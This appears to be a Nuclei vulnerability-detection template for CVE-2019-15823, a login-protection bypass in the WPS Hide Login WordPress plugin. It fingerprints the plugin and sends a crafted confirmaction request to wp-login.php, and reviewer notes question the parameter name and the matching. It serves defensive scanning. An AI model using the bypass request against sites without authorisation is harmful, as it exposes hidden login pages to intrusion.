# Detection template for CVE-2019-15823 (WPS Hide Login for WordPress).
# Two GET requests: the first fingerprints the plugin on the site root, the
# second checks whether the standard login form is still served at
# wp-login.php when the confirmaction parameter is supplied.
id: CVE-2019-15823

info:
  name: WPS Hide Login <= 1.5.2.2 - Login Page Bypass
  author: pussycat0x
  severity: high
  description: |
    WPS-Hide-Login plugin before 1.5.3 for WordPress contains an action=confirmaction protection bypass, letting attackers bypass security checks, exploit requires sending crafted requests.
  # Triage note: the matchers below only establish that the login form is
  # reachable despite the plugin. They do not show that authentication
  # itself was bypassed.
  impact: |
    Attackers can bypass login protection, potentially leading to unauthorized access.
  remediation: |
    Update to version 1.5.3 or later.
  reference:
    - https://web.archive.org/web/20230601185557/https://secupress.me/blog/wps-hide-login-v1-5-2-2-multiples-vulnerabilities/
    - https://web.archive.org/web/20230711062924/https://wpscan.com/vulnerability/9469/
  metadata:
    # Matches the two entries under `http:` below.
    max-request: 2
    verified: true
    fofa-query: body="/wp-content/plugins/wps-hide-login"
    vendor: wpserveur
    product: wps-hide-login
  tags: cve,cve2019,wordpress,wp-plugin,wp,disclosure,wps-hide-login,vuln

# The second request is evaluated only when the first one matched, so hosts
# without the plugin fingerprint are not probed at wp-login.php.
flow: http(1) && http(2)

http:
  # Request 1: plugin fingerprint on the site root, following same-host
  # redirects.
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true

    matchers:
      # Looks for the substring "wps-hide" anywhere in the response.
      # `internal: true` keeps this matcher as a gate for the flow rather
      # than a reported finding.
      # NOTE(review): presence of the string does not establish the installed
      # version; confirm the plugin is older than 1.5.3 before reporting.
      - type: word
        part: response
        words:
          - "wps-hide"
        internal: true

  # Request 2: no redirect following is configured here, so the 200 check
  # applies to the direct response from wp-login.php.
  # NOTE(review): the description names `action=confirmaction`, while this
  # path sends `SECUPRESSaction=confirmaction`. Confirm against the
  # referenced advisory that this is the intended parameter name.
  - method: GET
    path:
      - "{{BaseURL}}/wp-login.php?SECUPRESSaction=confirmaction"

    matchers:
      # All three expressions must hold: a 200 response whose body carries
      # both login-form markers.
      # NOTE(review): 'Username or Email Address' is English UI text, so a
      # localized WordPress install would presumably not match (a false
      # negative).
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Username or Email Address')"
          - "contains(body, 'wp-login-lost-password')"
        condition: and

# Signature over the template content. Any edit to the template, including
# comments, invalidates it until the template is re-signed.
# digest: 4a0a00473045022033aa8639fd9469a32da2ea8b728901eedb80aa49c641c417cf96d67cde737935022100f4d530c2b89ce82d52b09f24863a826c6ac4bbc8916cf2f7001e199306276607:922c64590222798bb761d5b6d8e72950